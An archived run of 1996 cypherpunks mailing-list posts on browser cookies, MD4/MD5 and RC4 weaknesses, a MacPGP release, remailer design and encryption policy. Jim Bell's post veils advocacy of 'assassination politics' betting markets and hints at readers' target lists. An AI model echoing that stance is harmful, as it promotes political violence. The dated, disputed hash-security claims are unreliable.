pissed off over Waco. in a country in which the populace believes that
the government is truly "of, by, or for the people" you won't see
this kind of discontent and barbarianism. terrorism is not normal but
generally an indication that a nation-state has gone badly off track and
neglected some important psychological need of some significant part
of its populace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 1 Jul 1996 15:46:31 +0800
To: vanished@alpha.c2.org
Subject: Re: Cookies anyone?
In-Reply-To: <199606292334.QAA20775@infinity.c2.org>
Message-ID: <Pine.LNX.3.94.960630162140.827A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 29 Jun 1996 vanished@alpha.c2.org wrote:

> While rummaging around in my cookie jar, I found this message--along with
> some cookies.
> 
> :Netscape HTTP Cookie File
> :# http://www.netscape.com/newsref/std/cookie_spec.html
> :# This is a generated file!  Do not edit.
> 
> Rather than bring down my system by experimenting, I thought I'd ask the list,
> "What happens if I delete this file?" and "What happens if I delete
> (edit) the cookies?"

I know that there were already several replies so I'll just add a little more
information.

If you are in DOS, you can prevent the cookies file from being written to by
making it read-only (attrib +r cookies.txt).  Ditto for UNIX.  Also, if you
have Netscape 3.04b, you can enable a security option that notifies you
whenever a server attempts to send you a cookie.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMdbi4bZc+sv5siulAQGybAP9Fs9eo/8/eiWPRrv7Y8u4jVUbwFFAk6/2
MAkNZJ4IgaZpKmb2lLZwmLbYtbE6sZ1W/KE7N5Hgm84M6vhKGI05vRazgGzHxjlX
u6s3dgBnc3ojokd61ZgJA/tXRasNEjRKNuH7AiYuqMym+rkrUxFfNQPcpnCDAyh4
MrpmZcQ0ByY=
=xFS+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 1 Jul 1996 15:46:26 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: rsync and md4
In-Reply-To: <199606301849.LAA23313@netcom18.netcom.com>
Message-ID: <Pine.LNX.3.94.960630163222.827B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 30 Jun 1996, Mike Duvos wrote:

> Has MD5 been broken again?  Or are you referring to that little
> collision problem which is unlikely to affect the security of the
> typical real life application?

The point isn't whether MD5 can be attacked in a "real life" application, but
that there is a flaw in MD5.  This means that it is weaker than an algorithm
like SHA that has no known cryptanalytical attacks against it.  Besides, a
hashing algorithm with a 128-bit output can be broken as easily as a 64-bit
encryption key.  MD5 shouldn't be used for that reason alone.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMdblK7Zc+sv5siulAQHlCgP7BHta126r27mc0Xw9UKy4wnXhzu3AbRBM
QauVyh5hHvWKMJ7tXZEyDOtzvGCL3KalHCcXE7cfnybhOS6D+w9K/ZTafY0ASwP+
q6VHT1F3r0b616hL0wfp165X/qTVYKb4urWRU0p+hv9mQ0ET0ZoYpHJz66+7YJ5o
AcobTzBNQyk=
=oyfI
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 1 Jul 1996 15:46:13 +0800
To: Steve Reid <root@edmweb.com>
Subject: Re: arcfour
In-Reply-To: <Pine.BSF.3.91.960629210817.626B-100000@bitbucket.edmweb.com>
Message-ID: <Pine.LNX.3.94.960630163919.827C-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 29 Jun 1996, Steve Reid wrote:

> A few questions about RC4...
> 
> I understand that RC4 is like a one-time-pad, in that a key can not be
> used more than once. What about adding a different salt to the key for
> each encryption? Would that be sufficent, even if the salt (but not the
> rest of the key) were known to an attacker? 

Probably.  
> 
> Is there any way to identify and weed out weak keys?

Keys starting with the sequence "00 00 FD", and "03 FD FC" are weak.

> 
> Does anyone have any sample data I can use to test an RC4 implementation?
> A key and the first few bytes of the stream should be sufficent. 

There are a few test vectors included in the original alleged-RC4 file
available on the usual crypto FTP sites.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMdbm/LZc+sv5siulAQHksQP9GkdqWiJ7s2ST4QF9ZwcFtFxzTk/PJskh
ReNuvXEmWFChkP0AVHJq8USFJDL4CuN4GI7d3sQpn+2HjFw+bcklCuH9zJrret2Y
mD7boKcYhzvi/abaKY9FF9/BNtC33yahrjhEIxYFx6QNTLGM9KCjBZIG7/sOAQvq
aMSYbfVhvz8=
=cgR3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Yanni" <jon@aggroup.com>
Date: Mon, 1 Jul 1996 15:45:20 +0800
To: Eric Murray <scott_wyant@loop.com
Subject: Re: [Fwd: Doubleclick]
Message-ID: <9606301649.AA32058@jon.clearink.com>
MIME-Version: 1.0
Content-Type: text/plain


> There's a very obvious way to get their cookie put in your cookies
> file without you explicitly going to their site.

This is my favorite example...

You work at a company.

Evil co-worker there says...check out this webpage I just setup.

You goto that page, the server gives you a cookie with
confidential information.
( 4k can store a lot of data..:) )...

Boss comes around and looks at your cookie file, notices
confidential information.

You get fired, sued, whatever....

> The server can send whatever it wants to you in the Set-Cookie:
> header.  Read the spec.

Yes, but you know the server that sent it. A Set-Cookie header can't
set the domain to be other than the domain that the cookie came from.
The message that was copied to the list implied that one domain could set
a cookie for another domain. That isn't true unless you have access the
the persons cookie file. ( as you implied in your response, but which
is beyond the scope of the original letter ).

Regards,

-jon

Jon (no h) S. Stevens        yanni@clearink.com
ClearInk WebMagus      http://www.clearink.com/
finger pgp@sparc.clearink.com for pgp pub key
We are hiring! Check out...
http://www.clearink.com/clearink/home/job.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Mon, 1 Jul 1996 15:45:52 +0800
To: maldrich@grci.com (Mark O. Aldrich)
Subject: Re: FTS2000 and Encryption?
In-Reply-To: <Pine.SCO.3.93.960630134925.4081B-100000@grctechs.va.grci.com>
Message-ID: <199606302206.SAA01870@nrk.com>
MIME-Version: 1.0
Content-Type: text


> I imagine that we'll see contining developments in the STU-III area (the
> most popular crypto phone in Government use), as well as new devices
> supporting Type I and Type II crypto for use on the FTS2000 nets.

I've heard an ISDN STU-III is either out or coming RSN.

One bugaboo I recall was that FTS2000 would not let us make a frac
T1 off-net connection. Alas, that included the remote diagnostic
number of the equip. mfgr ;-{

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Mon, 1 Jul 1996 15:45:46 +0800
To: perry@piermont.com
Subject: Re: secure WWW on UNsecure servers
In-Reply-To: <199606292310.TAA12274@jekyll.piermont.com>
Message-ID: <m0uaUjE-0000uSC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger enscribed thusly:
> Joseph Sokol-Margolis writes:
> > > How might one arrange for these encrypted web pages residing on an
> > > (unsecure) server to get decrypted only at the client's machine?
> > > This should work as transparently as possible for the user;
> > > except possibly for a userid/password query it should look like a
> > > normal web browsing session.  For now, we can assume that the
> > > decrypted web pages contain only HTML and images in .gif format.

> > It seems like it could be done by writing a plug-in that passed the
> > encrypted page to pgp (or had it internally) and used that to decrypt it.
> > The plug-in could store  the pass-phrase locally and clear when the user
> > disconnected.

> The "Right Way" to do what was asked is to use S/HTTP. However,
> Netscape, in their wisdom, has not implemented it.

	Uh...  Wait a minute...  The only ones to blame for the dearth
of S/HTTP systems are Tereasa systems and EIT.  While the rest of us have
been working on and developing for SSL those guys have stonewalled and
sat on it.  I know.  You ever try browsing for S/HTTP information.  Most of
the links on their site with any useful information refuse access to anyone
other that EIT members.  We've had a freely available SSL reference
implentation available for ages.  AFAIK they STILL don't have a working
reference implementation.  When they do, you can bet it will be EIT only.
They're so hell bent on keeping total control over it that they now
strangled it to death.  We now have freeware SSLeay and nobody is even
interested in screwing S/HTTP.  Forget that it's a better idea.  The idea
was stillborn because the parents strangled it a birth.

> Perry

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zbigniew Fiedorowicz <fiedorow@math.ohio-state.edu>
Date: Mon, 1 Jul 1996 15:40:15 +0800
To: cypherpunks@toad.com
Subject: MacPGP 2.6.3 released
Message-ID: <v03007801adfcbf68bf6f@[140.254.112.78]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have put FatMacPGP2.6.3 v 1.6 on my web page
   http://www.math.ohio-state.edu/~fiedorow/PGP
for distribution in the US and Canada in accordance with ITAR.
The distribution is encrypted and you have to read the file
README.txt for instructions on how to decrypt it.

Here is a description of the main features of FatMacPGP2.6.3 v 1.6
from the README in the distribution:

Enclosed is version 1.6 of FatMacPGP 2.6.3. This is a Macintosh port of
the international version PGP 2.6.3ia released 04.03.96. The underlying
PGP cryptographic code is the same as in the international release, except
that it uses the RSAREF1.0 RSA library instead of Philip Zimmermann's
MPILIB, in order to conform with US Patents on RSA.  Also the legal_kludge
switch, which allows interoperability with infringing pre-2.6 versions of
PGP, is disabled.

FatMacPGP 2.6.3 will run in native mode on a Power Macintosh, and will
also run on 68K Macintoshes having a 68020 CPU or better.  It will NOT
run on Macintoshes with only a 68000 CPU such as Pluses, SE's, Classics
or PB100's.

It contains all the enhancements and bug fixes of PGP 2.6.3ia such as
 1) It allows recipients of a public key message to be read in from a
    file containing the list of recipients, one per line. (Unlike
    previous versions of MacPGP it will not crash if the number of
    recipients exceeds 5 or 7.)
 2) When extracting multiple keys into an ascii file, the each key is
    put separately into its own block, neatly labelled with the key id
    and user ids.
 3) Better support for 8 bit character sets, ie. characters you get by
    holding down the option key.
 4) Userids can be automatically signed with your secret key when
    creating keys ('pgp -kg') or adding new userids ('pgp -ke'). This
    is controlled by the AutoSign flag in the Options menu.
 5) The misfeature of the initial 2.6.3i release, which didn't allow
    softwrapped text to be treated as text has been removed.
 6) When clearsigning messages, FatMacPGP 2.6.3 will add a "Charset:"
    headerto the signature block, explaining which character set was used
    for creating the signature. This will help the recipient of the message
    to select correct character conversion when verifying the signature.
    If he/she is using version 2.6.3i, PGP will automatically choose the
    correct character set, thereby eliminating a lot of "Bad signature"
    problems.

In addition to the above FatMacPGP 2.6.3 has many enhancements and bug
fixes relative to previous versions of MacPGP.
 1) Unlike MIT MacPGP 2.6.2 contains native Power PC code. Consequently
    it runs typically about 1.5 to 2 times faster than the MIT version on
    PPC machines, and even faster for large keyrings or large keys. It also
    runs typically 10-20% faster on 68K machines.
 2) It has a greatly enhanced AppleEvent suite. For instance, unlike the
    MIT version, it is  not necessary to write data to temporary files
    before passing it to MacPGP for en/de/cryption or signing. FatMacPGP
    2.6.3 accepts AppleEvent TEXT parameters up to 32K in size in memory
    and returns the processed data as a parameter to the reply AppleEvent.
    (See the accompanying documentation for further details.)
 3) It has options for automatic hardwrapping and detabbing of text, which
    should make  electronic transmission of clearsigned messages more
    reliable and increase interoperability with many DOS and Unix text
    processing programs.
 4) It has an option for stealthifying PGP encrypted files, removing any
    trace of their provenance. The resulting files can't be distinguished
    from white noise and can be completely concealed by "stegoing" into
    graphics and audio files. (There is of course also an option for
    destealthifying.)
 5) It has an option for using SHA1 as the hashing algorithm for PGP
    signatures, instead of MD5. (Dobbertin has recently made some
    dramatic progress towards cryptanalyzing MD5. If he is successful,
    this might call into question the reliability of PGP signatures
    under certain circumstances.) This is an experimental feature
    which is not compatible with earlier versions of PGP. (It is not
    compatible with the proposed standards of PGP 3.0 either. But
    3.0 is supposed to be deliberately incompatible with all 2.x
    versions to avoid the RSA patent issue.)

FatMacPGP 2.6.3 is distributed under the same license terms from MIT and
RSADSI as the 2.6.2 release, since its functional core is virtually
identical. Please read the license agreements prior to using the
program.  Distribution of this program may be subject to US government
export controls.

This release is not endorsed by Philip Zimmermann, MIT or anyone else.
However full source code for FatMacPGP 2.6.3 is being released together
with the executable (although in a separate archive). It is not difficult
to verify that the cryptographic core is unchanged from the 2.6.2 version.
Also the author is mentioned in Zimmermann's documentation as the
primary developer of previous MacPGP versions.

A few support files, such as sample AppleScripts and other extensions,
to facilitate interaction with the Eudora mailer program and the BBEdit
text editor are included. While they are fully functional and hopefully
useful, they are primarily intended to serve as illustrations to other
developers on how to integrate PGP with other Macintosh programs.
Detailed documentation can be found in the document "MacPGP263_AppleEvents"
in the Macintosh Documentation folder.

Read the included document "Verifying PGP" for instructions on how to
verify this copy of MacPGP. Beginners should first take a look at the
document "Getting Started with MacPGP". A detailed reference manual to
MacPGP entitled "MacPGP263_Manual" is enclosed in the Macintosh
Documentation folder and the indispensible "PGP User's Guide" by
Philip Zimmermann is in the Documentation folder.

Sources for FatMacPGP 2.6.3 will be available shortly.

Z. Fiedorowicz


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: mac
Comment: MacPGP 2.6.3

iQCVAwUBMdbLNr1LYmqiC9QjAQEl/wP+JXpDvgQ9VgTmXsvjjfFp+zd4v8ZeIMmt
45WcfqqPvSUPVEXv225MyYHMO1zKDkcKej1swBpFZDz5GV1eZJvriqYuNqc4Z0g0
0w9syQ2i6U5AoF6MR8bPs9Apq2Og9dRbFbaNXZ9Ba6bCtPHXyfZS1qQpi06Mkpty
Xh39nE3dv4s=
=/3Xe
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Mon, 1 Jul 1996 15:49:54 +0800
To: iang@cs.berkeley.edu
Subject: Re: anonymous mailing lists
Message-ID: <199607010012.UAA04061@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


iang@cs.berkeley.edu (Ian Goldberg) wrote:

> Yesterday, Dave and I discussed at length a design for a new
> remailer network...

If you are thinking of revamping the mixmaster protocol, I have a
couple of suggestions/requests.  One basic philosophy motivating all
of these ideas is that I would like to avoid requiring any
"centralized control" or consensus about exactly what remailers should
exist.  This can be achieved by pushing a lot of configuration
parameters into the anonymous messages, where the sender has control
over them

First, D-H (or RSA with short-lived keys) is an extremely good idea.
Long-lived encryption keys (like the current mixmaster secret keys)
should not be used for secrecy.  However, it would also be good if you
could avoid any man-in-the middle weaknesses.  Specifically, with
simple D-H, an active attack could be used to record all anonymous
messages from A to B, and weeks later if B is compromised the messages
could then be decrypted.

Thus, when sending from remailer A to remailer B, B's identity must be
proven with B's public key (either through RSA encrypting A's half of
the D-H secret key and a challenge with B's key, or by having B sign
his half of the D-H secret and a nonce).  Moreover, since not every
remailer will be known to every other, and since people may want to
set up and test new remailers for a while before announcing them to
the world, a strong cryptographic hash or MAC of B's public key should
be embedded in the remailed-message itself.  Thus, A can query B for
its public key and verify the public key, then use this public key to
know it is talking to the real "next hop".

It would also be nice to avoid having every message go through every
remailer unless the sender actually want's it to.  In particular, a
larger remailer network should not have to translate into more traffic
for all the remailers, as it would be nice to have as large a network
as possible.  Thus, if, for instance, remailer A sends messages out
every half hour, and A wants to send messages to B, C, and D--why not
send the three useful messages to B, C, and D all in the same round,
and just send garbage to all the other remailers.  Of course, messages
should be allowed to have as many next-hops as necessary, so that if
you don't want A to know that a message's next hop is B, you can ask
it to send the same message to C, F, and G as well as to B.  That way,
A won't know the real next hop.

Now the next question is, when sending garbage to all the other
remailers, should "all the other remailers" be defined by A or by the
anonymous message itself.  Here, A should definitely have some list of
remailers it knows about.  However, maybe at each hop a message should
be able to supply 6-byte (IP address/port number) addresses of other
remailers to which garbage should be send.  If there appears to be a
remailer at the address supplied, and that remailer is not already
known to A, perhaps the new remailer should automatically be added to
the list of garbage recipients (and then automatically deleted if it
stops responding for 24 hours).

In the event that A has a real backlog of messages for a particular
destination B, it might make sense for A to hand some of those
messages off to other remailers instead of just feeding them garbage.
That way, even when one remailer is receiving a lot of mail it won't
be immediately clear to it's operator which the preceeding hop is.

Given all these features, of course, it would be necessary to have
variable-length next-hop-descriptors instead of the fixed size and
number currently in mixmaster.  Is there some reason this can't be
done?  The total actual length of the 3-DES encrypted portion of the
mixmaster message shouldn't be available to any but the last hop.
Thus, is there something wrong with padding the message (or even just
the 10K header portion of the message if you want to keep the message
in two parts) with garbage to be 3-DES decrypted into more garbage at
the next hop?  Of course the padding should be done in such a way that
the final hop does not know how much space the remailing headers
originally took up, but this shouldn't be too hard (for instance the
padding could go between the headers and the message data).

Finally, another very useful feature would be some support for
improved response blocks.  Right now aliases like alpha.c2.org don't
offer very much security because they have to go through Type-1
remailers.  However, one could imagine mixmaster extensions to allow
it to work for replies as well as anonymous messages.  Imagine a nym
server with just a 10K mixmaster header as a response block.  The
server would pad a received message to 10K, prepend the 10K mixmaster
header, and send off the message.  At each hop of the way, the message
would get "decrypted" with some 3-DES key (and possibly a weird IV).
However, couldn't the recipient then just "encrypt" the message to
recover the plaintext?  Of course, this might undesireably weaken the
replay prevention, but there's got to be a good solution for response
blocks somewhere near what we currently have for mixmaster.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Mon, 1 Jul 1996 15:46:10 +0800
To: Zbigniew Fiedorowicz <fiedorow@math.ohio-state.edu>
Subject: Re: MacPGP 2.6.3 released
In-Reply-To: <v03007801adfcbf68bf6f@[140.254.112.78]>
Message-ID: <199607010105.VAA30534@ihtfp.org>
MIME-Version: 1.0
Content-Type: text/plain


>  2) When extracting multiple keys into an ascii file, the each key is
>     put separately into its own block, neatly labelled with the key id
>     and user ids.

I hope there is a way to put all the keys into a single key block.

>  5) It has an option for using SHA1 as the hashing algorithm for PGP
>     signatures, instead of MD5. (Dobbertin has recently made some
>     dramatic progress towards cryptanalyzing MD5. If he is successful,
>     this might call into question the reliability of PGP signatures
>     under certain circumstances.) This is an experimental feature
>     which is not compatible with earlier versions of PGP. 

This is ok...

>     (It is not compatible with the proposed standards of PGP 3.0
>     either. 

But I think this is a horrible mistable.  Besides the fact that there
is no "PGP 3.0" (there is "PGPlib", however), why isn't your code
compatible with the implementation that we're working on?  This can be
highly confusing when PGPlib comes out and messages signed with PGPlib
can't be verified by your code, and vice-versa.  Bad idea, Zig.

>     But 3.0 is supposed to be deliberately incompatible with
>     all 2.x versions to avoid the RSA patent issue.)

HUH?  Where did you get this faulty information?  PGPlib (as I said,
there is no PGP 3.0) will have full 2.6 support.  So, I don't know
where you heard this, but I would recommend you verify your
information with people close to the project before spreading more FUD
around.

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yap Remailer <remailer@yap.pactitle.com><x@x.x>
Date: Mon, 1 Jul 1996 19:39:05 +0800
To: cypherpunks@toad.com
Subject: Re: MacPGP 2.6.3 released
In-Reply-To: <199607010105.VAA30534@ihtfp.org>
Message-ID: <199607010634.XAA23399@yap.pactitle.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Derek Atkins <warlord@MIT.EDU>
> cc: cypherpunks@toad.com
> Date: Sun, 30 Jun 1996 21:05:01 EDT
> 
> Besides the fact that there is no "PGP 3.0" (there is "PGPlib",
> however)...
> 
> ...PGPlib (as I said, there is no PGP 3.0) will have full 2.6
> support.  So, I don't know where you heard this, but I would
> recommend you verify your information with people close to the
> project before spreading more FUD around.
> 
> Enjoy!

Where do I get PGPlib?  An Altavista search of PGPlib turned up
nothing, and it's not on net-dist.mit.edu, which I thought was the
canonical distribution point?

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 6 Jun 1996 23:33:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <199606070633.XAA01053@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:54 PM 6/6/96 -0700, Timothy C. May wrote:

>However, recall that Senator Jesse Helms elliptically threatened President
>Clinton by saying that Clinton had probably better be wearing a
>bullet-proof vest if he ever visited Helms' part of the country. (Even the
>Republicans were shocked by this, and, I surmise, cast Helms into the outer
>darkness, as Helms has been keeping a low profile for the past 18 months.)

However, Helms is a politician and he's supposed to be on his best behavior. 
 (What Helms' "best behavior" is, is certainly debateable.)


>* Third, while I am bored with Bell's "single note" point of view ("I have
>a solution for this")

Bored?  You're bored?  Maybe I'm going to have to figure out something to 
spice it up, huh?  By the time everybody is as bored as you are today, then 
I will have won.

>and while I feel his "assassination politics" is both naive

"naive"?  In what way?


> and derivative,

Technically, it wasn't derived from anything directly, or for that matter 
even indirectly.  However, since there's nothing new under the sun, 
similarities exist...with your material as well.  Consider this a bow to 
you, I suppose.

> I don't think his advocacy of AP constitutes a direct threat to anyone. 

Even so, given how much noise we've been hearing out of DC on the subject 
of the Internet, digital cash, and good encryption, I'd say SOMEBODY is 
getting a bit worried.  I haven't exactly been keeping this stuff a secret:  
What do you think their reaction has been, so far?  When those 
government-types start considering various scary scenarios, what do you 
think they are imagining?

>He is not actually setting up the betting markets which
>would make AP more of a reality, 

Not quite yet, anyway.  I'm very disappointed to have waited over a year for 
some slick lawyer to show me how I'd be violating some law or another to do so.

>nor is he calling for the killing of any particilar persons.

I generally don't feel the need to name specific people.  I'm sure each 
reader has his own pet list to fall back on.


>* Fourth, merely discussing alternative political systems is not enough to
>trigger legal action, at least not today.

Wait a year or two.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 29 Jun 1996 12:56:06 -0700 (PDT)
To: "Mark M." <Andrew.Tridgell@anu.edu.au
Subject: Re: rsync and md4
Message-ID: <199606291955.MAA11090@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:19 PM 6/29/96 -0400, Mark M. wrote:

>> A first guess might be 2^-128 but I know that this sort of thing is
>> rarely that simple. Is md4 that good?
>
>2^-64.
>> 
>> Note that I am not interested in "attacks" on md4 as such as the
>> source of the random data is just another file provided by the same
>> user, so it won't have been specially designed to defeat md4. 
>> 
>> If the probability is within a few orders of magnitude of 2^-128 then
>> can I also be sure that if I only use the first b bits of a md4
>> checksum it will be within a few orders of magnitude of 2^-b ? There
>> is an option in rsync to use a shorter checksum by truncating
>> md4. This saves some bytes on the link at the risk of lowering the
>> confidence. 
>
>The probability of failure is 2^-(b/2).

I don't think that's correct.  That would be the correct formula if I were 
looking for two strings that happened to have the same hash value, but 
that's not what he's asking for.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 1 Jul 1996 16:52:47 +0800
To: cypherpunks@toad.com
Subject: MD5 breaks, etc.
Message-ID: <199607010408.AAA19179@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



1) On the question of MD4, it has been demonstrated that one can
   generate multiple documents with the same hash -- an example was
   given in a paper a while back of two contracts, identical but for
   the dollar sum agreed two, with identical MD4 hashes. That
   demonstrates that MD4 is useless.

2) Hans Dobbertin on May 2nd released a short paper that circulated
   widely on the net describing collisions in the MD5 compression
   function. Several people have asked me for references on this. I
   cannot give you anything -- all I have is postscript of the
   document, which had not been published in any journal when I last
   checked. However, the result is widely known. MD5 is *not*
   something that should be trusted going forward, and I hope the next
   version of PGP uses SHA-1.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Mon, 1 Jul 1996 17:05:33 +0800
To: cypherpunks@toad.com
Subject: Re: rsync and md4
Message-ID: <199607010408.AAA21171@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Subject: Re: rsync and md4
To: perry@piermont.com, ogren@cris.com
Cc: markm@voicenet.com, Andrew.Tridgell@anu.edu.au, cypherpunks@toad.com

> 
> "David F. Ogren" writes:

> > Are you sure?  MD5 is a 128 bit hash, and the probability of collision
>  with 
> > a specific random piece of data (of any length) should be 2^-128.  I
>  could 
> > be wrong, but do you have any explanation of why you think the answer
>  is 
> > 2^-64.
> 
> Does the phrase "birthday attack" mean anything to you?

But this isn't a birthday attack. Its a comparison between one specific 
file and one randomly chosen one.

> > MD4 is the fastest hash I am aware of.  However, there has been some 
> > successful attacks against two rounds of MD4.  Although this is not to
> > suggest that MD4 is insecure, MD5 almost as fast (~1.3 times slower)
>  and 
> > more secure.
> 
> I'm afraid you are totally wrong here. MD4 has been completely
> broken. I wouldn't trust it for anything. In fact, MD5 is no longer
> trustworthy, either -- it was broken recently. Stick to SHA.
> 

Unless you are aware of some attack that I'm not, this is the most current 
information on MD4 and MD5:

MD4 has had successful attacks on limited rounds.  It has _not_ been 
completely cracked.

MD5 has not been broken.  A weakness has been shown, but collisions still 
cannot be developed.  So checksums should still be secure.  Additionally, 
in this case we are more concerned with the chance of random collisions 
than intentional collisions.

In fact, I was probably wrong to suggest MD5.  It _is_ more secure, but 
speed is his first priority, not security.  SHA1 is a good hash algorithm 
as far as security goes (I've used it myself), but it's over three times 
slower than MD4.


- --
David F. Ogren                | 
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
- --
David F. Ogren                | 
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMddOi+SLhCBkWOspAQHLTgf7BsDpCO2nhxsHYOunVv8abXWgITexhM/Z
vmYWaz2Lgu3tBYZHXIG7B2ijTikZ7u8RgMGd9esipjFxOks1bHRQwYbVbWeDUDb3
O0c5TmPPmZt/7PscUEw1D3hhtj8HeGmn9pfu0y/I54OnMIJzbvNMICpMtLLDXJCu
PhpUoAfamyRdWl9OYAvZ3LBMLBdGagzCh/jPxCQ9gEBq0aYMkxF1/qlfIMdmegow
H/uL+TRgN5roTIKDZPGPZWYbdLbf0NT00avPz5qKaA5BkOpxYgeRKtoBHdYC5krH
O2NZGZqb5LRKgxW9+IvCWoUoJQTB6IXP+YDU7p4pbn/Y/QORSHzqGA==
=WA0Y
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Palacios <bobpal@cdt.org>
Date: Mon, 1 Jul 1996 16:51:26 +0800
To: cypherpunks@toad.com
Subject: REMINDER: SAFE Forum Cybercast - Monday July 1, 12 noon - 6 pm EDT
Message-ID: <31D75EAB.41A7@cdt.org>
MIME-Version: 1.0
Content-Type: text/plain


SECURITY AND FREEDOM THROUGH ENCRYPTION FORUM
MONDAY JULY 1, 1996
STANFORD, CA
9:00 am - 3:00 pm PDT / 12:00 noon - 6:00 pm EDT / 1600 - 2000 GMT
 
On July 1, 1996 in the heart of California's Silicon Valley, members of
Congress and prominent computer industry leaders and privacy advocates will
meet to discuss the need to reform U.S. encryption policy.

The SAFE Forum will bring together members of Congress, privacy advocates,
cryptographers, and industry leaders for a discussion on the need to reform
U.S. encryption policy.

If you can't attend the SAFE Forum in person, you can still participate by
attending the cybercast of the event.  The cybercast will include still 
photos of the conference, a RealAudio broadcast of the forum, and a telnet
chat room for netizens to discuss the event and cryptography issues.

Just visit the SAFE Forum web site on Monday for the necessary links:

     http://www.crypto.com/safe/

(You will need to be a copy of RealAudio installed on your computer.  
Visit http://www.realaudio.com/ for a FREE copy of Real Audio).

The SAFE Forum Cybercast is brought to you with the help and support of:

     MediaCast (http://www.mediacast.com/)
       and
     AudioNet (http://www.audionet.com/)

---------------------------------------------------------------------------

Event Information

